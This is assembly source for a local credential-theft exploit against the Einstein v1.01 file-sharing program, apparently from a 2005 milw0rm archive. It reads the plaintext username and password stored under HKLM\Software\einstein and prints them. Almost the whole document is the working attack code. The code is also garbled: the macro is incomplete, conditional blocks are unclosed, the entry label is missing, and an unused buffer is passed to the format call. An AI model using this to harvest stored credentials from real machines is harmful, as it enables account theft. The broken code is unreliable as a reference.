; Nothing Special other than the program doesnt encode the user/pass in the registry.
; Einstein v1.01 - http://www.Bfriendly.com some crappy file school sharing program
; made because i think C is overkill for these types of local exploits,
; shit we can does this in vbs/bat too if ya want
;Compiles in Masm
;c:\Masm32\BIN\ml.exe /c /coff /Cp einstein.asm
;c:\Masm32\BIN\Link.exe /SUBSYSTEM:CONSOLE /LIBPATH:c:\MASM32\lib einstein.obj
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\masm32.lib
literal MACRO quoted_text:VARARG
LOCAL local_text
local_text db quoted_text,0
EXITM <local_text>
EXITM <ADDR literal(quoted_text)>
SubKey db "Software\\einstein",0
szUser db "username",0
szPass db "password",0
noExeem db "Einstein v1.01 is not installed on your pc!",0
Theoutput db '_______________________________________________________________',13,10
db '* Einstein v1.01 Local Pass Exploit *',13,10
db '* Based On Kozans code in C *',13,10
db '* by illwill - xillwillx@yahoo.com *',13,10
db '*_____________________________________________________________*',13,10
db ' UserName: %s ',13,10
db ' Password: %s ',13,10,0
KeySize DWORD 255
TheIPData db 64 dup (?)
TheUSERData db 64 dup (?)
ThePASSData db 64 dup (?)
TheReturn DWORD ?
strbuf db 258 dup (?)
invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr SubKey,0,KEY_READ,addr TheReturn
invoke RegQueryValueEx,TheReturn,addr szUser,0,0,addr TheUSERData, addr KeySize
.IF KeySize < 2
invoke lstrcpy,addr TheUSERData,SADD("NOT FOUND")
invoke RegQueryValueEx,TheReturn,addr szPass,0,0,addr ThePASSData, addr KeySize
.IF KeySize < 2
invoke lstrcpy,addr ThePASSData,SADD("NOT FOUND")
invoke wsprintf, addr strbuf, addr Theoutput,addr TheIPData,addr TheUSERData,addr ThePASSData
invoke StdOut, addr strbuf
invoke StdOut, addr noExeem
invoke RegCloseKey , TheReturn
Invoke ExitProcess,0
end start
; milw0rm.com [2005-02-28]